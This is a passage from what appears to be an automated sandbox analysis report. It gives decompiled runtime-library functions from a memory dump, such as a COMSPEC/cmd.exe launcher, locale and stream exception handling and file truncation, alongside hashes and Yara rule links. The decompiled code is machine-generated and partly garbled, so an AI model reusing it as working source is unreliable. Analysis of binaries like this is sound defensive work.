								if(_t166 == 0) {
									L33:
									E00E964B8(_t166);
									return _t161;
								}
								_t112 = E00E9E94E(_t161, _t166, _v12, _a4, 0xffffffff);
								_t173 = _t173 + 0x14;
								__eflags = _t112;
								if(_t112 == 0) {
									_t161 = E00E94222(_v0, _t166);
									goto L33;
								}
								__eflags = _t112 - 0x16;
								if(_t112 != 0x16) {
									__eflags = _t112 - 0x22;
									if(_t112 != 0x22) {
										goto L33;
									}
								}
							} else {
								__eflags = _t108 - 0x16;
								if(_t108 != 0x16) {
									__eflags = _t108 - 0x22;
									if(_t108 != 0x22) {
										goto L27;
									}
								}
							}
							_push(_t161);
							_push(_t161);
							_push(_t161);
							_push(_t161);
							_push(_t161);
							E00E92919();
							asm("int3");
							_push(_t169);
							E00E9DDCF();
							_v112 =  &_v84;
							_v108 =  &_v80;
							_t118 = 4;
							_v100 = _t118;
							_v104 = _t118;
							_push( &_v100);
							_push( &_v112);
							_push( &_v104);
							return E00E95399(__eflags);
						} else {
							goto L4;
						}
					}
				}
				goto L37;
			}

0x00e953f4
0x00e953fa
0x00e953fc
0x00e953fe
0x00e95400
0x00e95405
0x00e95408
0x00e9540b
0x00e95450
0x00e95450
0x00000000
0x00e9540d
0x00e9540d
0x00e95412
0x00e95415
0x00e9541a
0x00e9541d
0x00e95420
0x00e9542a
0x00e9542f
0x00e95432
0x00e95437
0x00e9543c
0x00e95465
0x00e95468
0x00e9546a
0x00000000
0x00e9546c
0x00e9546c
0x00e9546c
0x00e95476
0x00e9547c
0x00e95481
0x00e95484
0x00e95486
0x00e954a5
0x00e954a8
0x00e954a8
0x00e954b3
0x00e954b5
0x00e954b9
0x00e954bd
0x00e954c9
0x00e954d0
0x00e954d5
0x00e954da
0x00e954da
0x00e954da
0x00e954bd
0x00e954dd
0x00e954e0
0x00e954e7
0x00e954e9
0x00e954f0
0x00e954f6
0x00e954fc
0x00e954fe
0x00e95500
0x00e95504
0x00e95505
0x00e95511
0x00e9551b
0x00e9551d
0x00e9551d
0x00e9551d
0x00e9551d
0x00e95505
0x00e954fe
0x00e954f0
0x00e95525
0x00e95525
0x00e95528
0x00e95530
0x00e9553a
0x00e95452
0x00e95458
0x00e95488
0x00e95488
0x00e9548b
0x00e95543
0x00e95543
0x00e95543
0x00000000
0x00e95491
0x00e95491
0x00e95494
0x00000000
0x00e9549a
0x00e9549b
0x00000000
0x00e954a0
0x00e95494
0x00e9548b
0x00e95486
0x00e9543e
0x00e95441
0x00e95545
0x00e95545
0x00e95546
0x00e95547
0x00e95548
0x00e95549
0x00e9554a
0x00e9554f
0x00e95553
0x00e95555
0x00e95556
0x00e9555a
0x00000000
0x00e95567
0x00e9556a
0x00e9556b
0x00e95574
0x00e9557c
0x00e95581
0x00e95584
0x00e95586
0x00e95592
0x00e9559c
0x00e955a0
0x00e955a2
0x00e955d3
0x00e955d4
0x00000000
0x00e955dd
0x00e955ae
0x00e955b3
0x00e955b6
0x00e955b8
0x00e955d1
0x00000000
0x00e955d1
0x00e955ba
0x00e955bd
0x00e955bf
0x00e955c2
0x00000000
0x00e955c4
0x00e955c2
0x00e95588
0x00e95588
0x00e9558b
0x00e9558d
0x00e95590
0x00000000
0x00000000
0x00e95590
0x00e9558b
0x00e955e2
0x00e955e3
0x00e955e4
0x00e955e5
0x00e955e6
0x00e955e7
0x00e955ec
0x00e955ef
0x00e955f5
0x00e955fd
0x00e95608
0x00e9560b
0x00e9560c
0x00e9560f
0x00e95615
0x00e95619
0x00e9561d
0x00e95626
0x00000000
0x00000000
0x00000000
0x00e95441
0x00e9543c
0x00000000

APIs

Part of subcall function 00E9830D: GetLastError.KERNEL32(00000000,00000001,00000004,00E91A0E,00000001,00000000,00000002,?,00E98F84,00000002,00000000,00000001,00000002), ref: 00E98312
Part of subcall function 00E9830D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00E98F84,00000002,00000000,00000001,00000002), ref: 00E983B0

_free.LIBCMT ref: 00E9549B
_free.LIBCMT ref: 00E954C9
_free.LIBCMT ref: 00E95511

Strings

#V, xrefs: 00E95420, 00E9546C, 00E954A8, 00E95423, 00E9546F

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID: #V
API String ID: 3291180501-3658881132
Opcode ID: 4266cecba2c7bf4c59c77087eff4c28e7b2a64568a4fa5d866266526dbca24ae
Instruction ID: 07b670864d26624caf33bf099402d3defffdb85955d4e6581e37b1f35419696f
Opcode Fuzzy Hash: 4266cecba2c7bf4c59c77087eff4c28e7b2a64568a4fa5d866266526dbca24ae
Instruction Fuzzy Hash: 66419B32600505AFDB65CFACC881A69B3E9EF49318B64156DE419E7392EB31EC50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E9097A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00E9097A(signed int __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t18;
				void* _t21;
				char* _t22;
				signed int* _t29;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				intOrPtr _t46;
				signed int _t49;
				signed int _t55;
				void* _t57;

				L0:
				while(1) {
					L0:
					_t37 = __ebx;
					_pop(_t53);
					_t54 = _t55;
					_t18 =  *0xea9014; // 0xa413846
					_v8 = _t18 ^ _t55;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t46 = _a4;
					_t49 = 0;
					_v28 = 0;
					_t21 = E00E9185E( &_v28, 0, "COMSPEC");
					_t57 = _t55 - 0x18 + 0xc;
					if(_t21 == 0 || _t21 != 0x16) {
						break;
					}
					L15:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00E92919();
					asm("int3");
				}
				L3:
				if(_t46 != 0) {
					_t22 = _v32;
					_v28 = _t22;
					_v24 = "/c";
					_v20 = _t46;
					_v16 = _t49;
					if(_t22 == 0) {
						L13:
						_push(_t49);
						_v28 = "cmd.exe";
						_t49 = E00E96D9C(_t37, _t46, _t49, _t49, "cmd.exe",  &_v28);
					} else {
						_t46 =  *((intOrPtr*)(E00E95BBD()));
						_t29 = E00E95BBD();
						_push(_t49);
						 *_t29 = _t49;
						_push( &_v28);
						_t31 = E00E96AC5(_t49, _v28);
						_t57 = _t57 + 0x10;
						_t37 = _t31;
						_t32 = E00E95BBD();
						if(_t37 == 0xffffffff) {
							if( *_t32 == 2 ||  *((intOrPtr*)(E00E95BBD())) == 0xd) {
								 *((intOrPtr*)(E00E95BBD())) = _t46;
								goto L13;
							} else {
								_t49 = _t49 | 0xffffffff;
							}
						} else {
							 *_t32 = _t46;
							_t49 = _t37;
						}
					}
				} else {
					if(_v32 != _t49) {
						_t35 = E00E96EA8(_t37, _t49, _v32, _t49);
						asm("sbb esi, esi");
						_t49 =  ~_t35 + 1;
					}
				}
				E00E964B8(_v32);
				return E00E8AE43(_v12 ^ _t54);
			}

0x00e9097a
0x00e9097a
0x00e9097a
0x00e9097a
0x00e9097f
0x00e9087d
0x00e90882
0x00e90889
0x00e9088c
0x00e9088d
0x00e9088e
0x00e9088f
0x00e90895
0x00e9089e
0x00e908a1
0x00e908a6
0x00e908ab
0x00000000
0x00000000
0x00e9096f
0x00e9096f
0x00e90970
0x00e90971
0x00e90972
0x00e90973
0x00e90974
0x00e90979
0x00e90979
0x00e908b6
0x00e908b8
0x00e908d7
0x00e908da
0x00e908dd
0x00e908e4
0x00e908e7
0x00e908ec
0x00e9093a
0x00e9093a
0x00e90946
0x00e90951
0x00e908ee
0x00e908f3
0x00e908f5
0x00e908fa
0x00e908fb
0x00e90900
0x00e90905
0x00e9090a
0x00e9090d
0x00e9090f
0x00e90917
0x00e90922
0x00e90938
0x00000000
0x00e9092e
0x00e9092e
0x00e9092e
0x00e90919
0x00e90919
0x00e9091b
0x00e9091b
0x00e90917
0x00e908ba
0x00e908bd
0x00e908c7
0x00e908d1
0x00e908d4
0x00e908d4
0x00e908bd
0x00e90956
0x00e9096e

APIs

_free.LIBCMT ref: 00E90956

Strings

COMSPEC, xrefs: 00E90897
cmd.exe, xrefs: 00E9093E, 00E90944
F8A/, xrefs: 00E90882

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: COMSPEC$F8A/$cmd.exe
API String ID: 269201875-201143083
Opcode ID: cb4b467328946268e856238a5676f506e11c75ac91c7c34bb2f905d62bba2c59
Instruction ID: d4968e1577cd2f788a1d679b7ad5db48ef8b4827164f918cc61d7f03da89736a
Opcode Fuzzy Hash: cb4b467328946268e856238a5676f506e11c75ac91c7c34bb2f905d62bba2c59
Instruction Fuzzy Hash: D031D672D012199FAF25ABA98C029BFBBF8DFC1314B505166F914B7252EB704E00DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00E96DA7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00E96DA7(void* __ebx, void* __esi, WCHAR* _a4, unsigned int _a8) {
				signed int _v8;
				void _v44;
				signed int _t16;
				WCHAR* _t18;
				intOrPtr* _t29;
				intOrPtr* _t33;
				unsigned int _t37;
				intOrPtr _t45;
				intOrPtr _t46;
				signed int _t47;

				_t16 =  *0xea9014; // 0xa413846
				_v8 = _t16 ^ _t47;
				_t18 = _a4;
				if(_t18 != 0) {
					_t37 = _a8;
					if((_t37 & 0xfffffff9) == 0) {
						if(GetFileAttributesExW(_t18, 0,  &_v44) != 0) {
							if((_v44 & 0x00000010) == 0 && (_v44 & 0x00000001) != 0 && (_t37 >> 0x00000001 & 0x00000001) != 0) {
								 *(E00E95BAA()) = 5;
								 *((intOrPtr*)(E00E95BBD())) = 0xd;
								goto L10;
							}
						} else {
							E00E95B87(GetLastError());
							L10:
							E00E95BBD();
						}
					} else {
						 *(E00E95BAA()) =  *_t28 & 0x00000000;
						_t29 = E00E95BBD();
						_t45 = 0x16;
						 *_t29 = _t45;
						E00E928EC();
					}
				} else {
					 *(E00E95BAA()) =  *_t32 & 0x00000000;
					_t33 = E00E95BBD();
					_t46 = 0x16;
					 *_t33 = _t46;
					E00E928EC();
				}
				return E00E8AE43(_v8 ^ _t47);
			}

0x00e96daf
0x00e96db6
0x00e96db9
0x00e96dbf
0x00e96ddd
0x00e96de6
0x00e96e12
0x00e96e27
0x00e96e3b
0x00e96e46
0x00000000
0x00e96e46
0x00e96e14
0x00e96e1b
0x00e96e4c
0x00e96e4c
0x00e96e51
0x00e96de8
0x00e96ded
0x00e96df0
0x00e96df7
0x00e96df8
0x00e96dfa
0x00e96dff
0x00e96dc1
0x00e96dc6
0x00e96dc9
0x00e96dd0
0x00e96dd1
0x00e96dd3
0x00e96dd8
0x00e96e66

Strings

F8A/, xrefs: 00E96DAF

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: F8A/
API String ID: 0-73971870
Opcode ID: 41e4c31df7afdea40f592587ed40c826bb7d8e3652c9eabda9a6fcc68897a7d2
Instruction ID: b8440ef34fc0708779f8b63a64afa5c49df3061aeb4c0c2a46a3f7a7f2218588
Opcode Fuzzy Hash: 41e4c31df7afdea40f592587ed40c826bb7d8e3652c9eabda9a6fcc68897a7d2
Instruction Fuzzy Hash: 8B1108726056089FEF16BBB8CC45BDD77E89F09B15F00204AF905BB291EBB4994087B1

Uniqueness

Uniqueness Score: -1.00%

Function 00E9A085, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E9A085(struct HINSTANCE__* _a4, char _a8, intOrPtr _a12) {
				signed int _v8;
				short _v532;
				char _v533;
				char _v540;
				signed int _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				char _v560;
				signed int _t18;
				intOrPtr _t22;
				char _t34;
				signed int _t38;

				_t18 =  *0xea9014; // 0xa413846
				_v8 = _t18 ^ _t38;
				if(GetModuleFileNameW(_a4,  &_v532, 0x105) != 0) {
					_t34 = _a8;
					_t22 = _a12;
					_t6 =  &_v544;
					 *_t6 = _v544 & 0x00000000;
					__eflags =  *_t6;
					_v560 = _t34;
					_v556 = _t22;
					_v552 = _t34;
					_v548 = _t22;
					_v540 = 0;
					E00E99FBE( &_v532,  &_v560,  &_v533, E00E96E67( *_t6));
				} else {
					E00E95B87(GetLastError());
				}
				return E00E8AE43(_v8 ^ _t38);
			}

0x00e9a090
0x00e9a097
0x00e9a0b2
0x00e9a0c5
0x00e9a0c8
0x00e9a0cb
0x00e9a0cb
0x00e9a0cb
0x00e9a0d2
0x00e9a0d8
0x00e9a0de
0x00e9a0e4
0x00e9a0ea
0x00e9a10c
0x00e9a0b4
0x00e9a0bb
0x00e9a0c1
0x00e9a127

APIs

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00E9A0AA
GetLastError.KERNEL32 ref: 00E9A0B4
__dosmaperr.LIBCMT ref: 00E9A0BB

Strings

F8A/, xrefs: 00E9A090

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastModuleName__dosmaperr
String ID: F8A/
API String ID: 4076908705-73971870
Opcode ID: a5ddc3c9bc1014dadf2e7a00a4d464b0c4da1daa2de094537bb5350b44ef7b54
Instruction ID: 33e791ea94957d9b56f46acbd9d497b73e374dcd9e90f0a5d68130ca68f5f4a9
Opcode Fuzzy Hash: a5ddc3c9bc1014dadf2e7a00a4d464b0c4da1daa2de094537bb5350b44ef7b54
Instruction Fuzzy Hash: 4F113C7194511CAFCF10DFA4EC89BDAB7F8AB18300F1005D9A519E7241EA30AA848F95

Uniqueness

Uniqueness Score: -1.00%

Function 00E83475, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E83475(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v16;
				signed int _t41;
				signed int* _t58;
				signed int* _t60;
				void* _t75;
				signed int* _t76;

				_t75 = __ecx;
				E00E8B97D(__ecx, 0);
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				if(_a4 == 0) {
					_t58 =  &_v16;
					E00E83434(_t58, "bad locale name");
					E00E8D24A( &_v16, 0xea64a4);
					asm("int3");
					_push(_t75);
					_t76 = _t58;
					E00E8BD26(_t58, _t76);
					if(_t76[0xb] != 0) {
						E00E90985(_t76[0xb]);
					}
					_t76[0xb] = 0;
					if(_t76[9] != 0) {
						E00E90985(_t76[9]);
					}
					_t76[9] = 0;
					if(_t76[7] != 0) {
						E00E90985(_t76[7]);
					}
					_t76[7] = 0;
					if(_t76[5] != 0) {
						E00E90985(_t76[5]);
					}
					_t76[5] = 0;
					if(_t76[3] != 0) {
						E00E90985(_t76[3]);
					}
					_t76[3] = 0;
					if(_t76[1] != 0) {
						E00E90985(_t76[1]);
					}
					_t76[1] = 0;
					_t60 = _t76;
					_t41 =  *_t60;
					if(_t41 == 0) {
						return E00E9536B(4);
					} else {
						if(_t41 < 8) {
							return E00E8C23B(0xeaa0a0 + _t41 * 0x18, 0xeaa0a0 + _t41 * 0x18);
						}
						return _t41;
					}
				} else {
					E00E8BCDB(__ecx, __ecx, _a4);
					return _t75;
				}
			}

0x00e8347f
0x00e83482
0x00e83487
0x00e8348c
0x00e8348f
0x00e83492
0x00e83495
0x00e83498
0x00e8349c
0x00e8349f
0x00e834a3
0x00e834a6
0x00e834a9
0x00e834ac
0x00e834b2
0x00e834cc
0x00e834cf
0x00e834dd
0x00e834e2
0x00e834e3
0x00e834e4
0x00e834e8
0x00e834f2
0x00e834f7
0x00e834fc
0x00e834ff
0x00e83505
0x00e8350a
0x00e8350f
0x00e83510
0x00e83516
0x00e8351b
0x00e83520
0x00e83521
0x00e83527
0x00e8352c
0x00e83531
0x00e83532
0x00e83538
0x00e8353d
0x00e83542
0x00e83543
0x00e83549
0x00e8354e
0x00e83553
0x00e83554
0x00e83557
0x00e8b9d5
0x00e8b9d9
0x00e95398
0x00e8b9df
0x00e8b9e2
0x00000000
0x00e8b9f2
0x00e8b9f3
0x00e8b9f3
0x00e834b4
0x00e834b8
0x00e834c4
0x00e834c4

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E83482
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E834B8

Part of subcall function 00E8BCDB: _Yarn.LIBCPMT ref: 00E8BCFA
Part of subcall function 00E8BCDB: _Yarn.LIBCPMT ref: 00E8BD1E

__CxxThrowException@8.LIBVCRUNTIME ref: 00E834DD

Strings

bad locale name, xrefs: 00E834C7

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: e9c57032e9aa5d8aa9e1b963de5d3505885841592e5206c1470e2f1e8ce8f8d3
Instruction ID: aaf73a019f1c35e7e738ac6ad51c180ed32aa81fc800c746926baa2b46437e09
Opcode Fuzzy Hash: e9c57032e9aa5d8aa9e1b963de5d3505885841592e5206c1470e2f1e8ce8f8d3
Instruction Fuzzy Hash: 8F01A271405744AFC321EF7A8881887FBE8BE28700350992EE09EE3A51D730F104CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00E83AC3, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00E83AC3(void* __ebx, intOrPtr* __ecx, void* __edi, signed char _a4) {
				char _v16;
				char _v36;
				intOrPtr _v44;
				void* __esi;
				void* _t15;
				void* _t18;
				intOrPtr* _t19;
				void* _t21;
				char* _t22;
				intOrPtr* _t23;
				void* _t27;
				void* _t28;

				_t21 = __edi;
				_t19 = __ecx;
				_t18 = __ebx;
				_t27 = _t28;
				_push(_t22);
				if(__ecx != 0) {
					_push(0);
					_push(0);
				} else {
					if((_a4 & 0x00000004) == 0) {
						_t22 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
					} else {
						_t22 = "ios_base::badbit set";
					}
					_t15 = E00E83883( &_v16, _t21, _t22);
					_t19 =  &_v36;
					E00E83A43(_t18, _t19, _t21, _t22, _t27, _t22, _t15);
					_push(0xea6564);
					_push( &_v36);
				}
				E00E8D24A();
				asm("int3");
				_push(_t22);
				_t23 = _t19;
				E00E83B43(_t19, _v44);
				 *_t23 = 0xe7da30;
				return _t23;
			}

0x00e83ac3
0x00e83ac3
0x00e83ac3
0x00e83ac4
0x00e83ac9
0x00e83acc
0x00e83b09
0x00e83b0b
0x00e83ace
0x00e83ad2
0x00e83ae9
0x00e83ad4
0x00e83ad4
0x00e83ad4
0x00e83aef
0x00e83af6
0x00e83af9
0x00e83afe
0x00e83b06
0x00e83b06
0x00e83b0d
0x00e83b12
0x00e83b13
0x00e83b18
0x00e83b1a
0x00e83b1f
0x00e83b28

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00E83B0D

Strings

ios_base::failbit set, xrefs: 00E83ADF, 00E83B13
ios_base::eofbit set, xrefs: 00E83AE4
ios_base::badbit set, xrefs: 00E83AD4, 00E83AF5

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 2efd84b4190b81c8982af518382bf2fbaa658fc01b010801a3519f3ffdebaefc
Instruction ID: 40c9c7a6e60205a754b8560cc7909464afa52af8f30a94741309bd2ab172d14b
Opcode Fuzzy Hash: 2efd84b4190b81c8982af518382bf2fbaa658fc01b010801a3519f3ffdebaefc
Instruction Fuzzy Hash: 5FF0F0A180831862DB18BA609C02FDA7AA89F44B44F14A0A8FD8E360D1D6A08F0083E0

Uniqueness

Uniqueness Score: -1.00%

Function 00EA40BE, Relevance: 6.1, APIs: 4, Instructions: 133
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00EA40BE(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				int _t34;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				intOrPtr* _t43;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E00EA4071( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E00E95BBD()));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E00E972D3(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if((_t31 & _t58) == 0xffffffff) {
							goto L28;
						}
						_t34 = SetEndOfFile(E00E9B205(_t50));
						__eflags = _t34;
						if(_t34 != 0) {
							L18:
							_t59 = 0;
							L29:
							E00E972D3(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E00E95BBD())) = 0xd;
						_t36 = E00E95BAA();
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E00E998AF(0x1000, 1);
						_pop(_t54);
						if(_t38 != 0) {
							_v12 = E00E937CE(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E00EA2B23(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(_t42 == 0xffffffff) {
										_t43 = E00E95BAA();
										__eflags =  *_t43 - 5;
										if( *_t43 == 5) {
											 *((intOrPtr*)(E00E95BBD())) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E00E95BBD()));
										E00E964B8(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E00E937CE(_t56, _t50, _v12);
							E00E964B8(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E00E95BBD())) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}

0x00ea40be
0x00ea40c7
0x00ea40d6
0x00ea40e4
0x00ea420d
0x00ea4212
0x00000000
0x00ea40f9
0x00ea40f9
0x00ea40fc
0x00ea40ff
0x00ea4102
0x00ea4104
0x00ea41c9
0x00ea41d2
0x00ea41d9
0x00ea41dc
0x00ea41df
0x00000000
0x00000000
0x00ea41e9
0x00ea41ef
0x00ea41f1
0x00ea4196
0x00ea4196
0x00ea4214
0x00ea421f
0x00ea422f
0x00ea422f
0x00ea41f8
0x00ea41fe
0x00ea420b
0x00000000
0x00ea420b
0x00ea410a
0x00ea4120
0x00ea4123
0x00ea4126
0x00ea4141
0x00ea4144
0x00ea4147
0x00ea4148
0x00ea4148
0x00ea414a
0x00ea415d
0x00ea415d
0x00ea415f
0x00ea4162
0x00ea4167
0x00ea416a
0x00ea416d
0x00ea419a
0x00ea419f
0x00ea41a2
0x00ea41a9
0x00ea41a9
0x00ea41af
0x00ea41b5
0x00ea41b7
0x00000000
0x00ea41bc
0x00ea416f
0x00ea4170
0x00ea4172
0x00ea4175
0x00ea4177
0x00ea417a
0x00ea417c
0x00ea4156
0x00ea4156
0x00000000
0x00ea4156
0x00ea417e
0x00000000
0x00000000
0x00000000
0x00ea417e
0x00ea414c
0x00000000
0x00000000
0x00ea414e
0x00ea4154
0x00000000
0x00000000
0x00000000
0x00ea4180
0x00ea4180
0x00ea4180
0x00ea4188
0x00ea418e
0x00ea4193
0x00000000
0x00ea4193
0x00ea412d
0x00000000
0x00ea41bf
0x00ea41bf
0x00ea41c1
0x00000000
0x00000000
0x00ea41c3
0x00000000
0x00000000
0x00ea41c5
0x00ea41c7
0x00000000
0x00000000
0x00000000
0x00ea41c7
0x00ea410a

APIs

_free.LIBCMT ref: 00EA418E
_free.LIBCMT ref: 00EA41B7
SetEndOfFile.KERNEL32(00000000,00EA1DBD,00000000,00E9892B,?,?,?,?,?,?,?,00EA1DBD,00E9892B,00000000), ref: 00EA41E9
GetLastError.KERNEL32(?,?,?,?,?,?,?,00EA1DBD,00E9892B,00000000,?,?,?,?,00000000), ref: 00EA4205

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 3d47f35467252192ab886d269d73805d9beefe0171556e776d2f8bae81b63c66
Instruction ID: a378d2af63e143afd44255d74092a487168f92deba5ad47eb5fb743371533673
Opcode Fuzzy Hash: 3d47f35467252192ab886d269d73805d9beefe0171556e776d2f8bae81b63c66
Instruction Fuzzy Hash: 5C41B9F29016059ADF11ABB8CC46B9D37F5EFAA364F242111F424FF2D1E6B4A8804771

Uniqueness

Uniqueness Score: -1.00%

Function 00EA1292, Relevance: 6.1, APIs: 4, Instructions: 90
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EA1292(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, struct _SECURITY_ATTRIBUTES* _a12, struct _SECURITY_ATTRIBUTES* _a16, int _a20, long _a24, void* _a28, intOrPtr _a32, struct _STARTUPINFOW* _a36, struct _PROCESS_INFORMATION* _a40) {
				char _v8;
				WCHAR* _v12;
